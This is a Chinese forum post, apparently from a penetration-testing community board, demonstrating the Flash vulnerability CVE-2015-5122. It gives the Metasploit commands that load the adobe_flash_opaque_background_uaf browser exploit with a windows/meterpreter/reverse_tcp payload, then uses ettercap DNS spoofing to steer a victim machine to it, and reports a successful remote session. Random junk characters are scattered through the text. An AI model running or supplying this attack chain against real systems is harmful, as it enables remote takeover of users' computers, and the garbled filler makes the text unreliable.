二、cve2015-5122漏洞实例演示虚拟机 9 K1 o2 Q8 H0 z
9 T# a. e/ S$ Q" u2 N9 v% L. u; w: \# o9 ]1 }* q0 Z6 Y, F 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 3 n3 ]/ w+ A! {* Z
search cve-2015-5122如图: ' z6 l* x! e: y/ K4 {4 p0 V
0 y E5 @9 ?* g! M8 g5 ]: C" ^$ {2 A2 Q* g/ V 8 Z5 n7 O4 l/ I6 I
& ]0 f9 F" ]0 N- S, Q2 C下面我们敲如下命令:
$ q- L! H' b- ?3 x& n2 {" a+ s( {" m2 f, B! ~# x use exploit/multi/browser/adobe_flash_opaque_background_uaf
: j- i b7 ?5 Z5 G" o3 s set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.109 9 t) r) O3 @) o o8 A1 i' t
3 ~, k- J6 D* e' V; {$ t& g, t% ^% N- c- {$ S set URIPATH / /*根目录*/ 8 L9 O0 b+ z+ ?; R1 @% V9 z
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
4 U! D$ \( Y' X5 L; D+ _' K set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
9 g+ E& w$ q6 Z i4 h M8 X5 m然后show options如图: 0 ?& K1 b$ N& }0 [1 Z
, O0 z! s) C7 `9 v7 E+ l. N
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
2 T2 @: H) \- l% j6 d
: \7 M, q$ M# {3 X: [$ i
N# s- b& Y& ~3 h# Y+ @, R 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
; s1 h- |1 t! y4 B Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf * S# ~2 V! l4 E
$ Z. y6 i) W R- N* \; H& ~
成功了,这时候我们断开ettercap,如图:
, P4 F( Z1 x1 W V1 J8 R1 Z4 Q3 C, M
' Q5 @" D9 q( P1 u6 z9 y_% L& i% B' c$ ^7 `( m Screenshot如图: # g3 @4 `! x L
- @1 H* t# m7 m
i& v0 E/ B/ v6 H, n' f7 P% |9 c j' P/ O ~ ) ^- S' P& t8 t" Y a
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |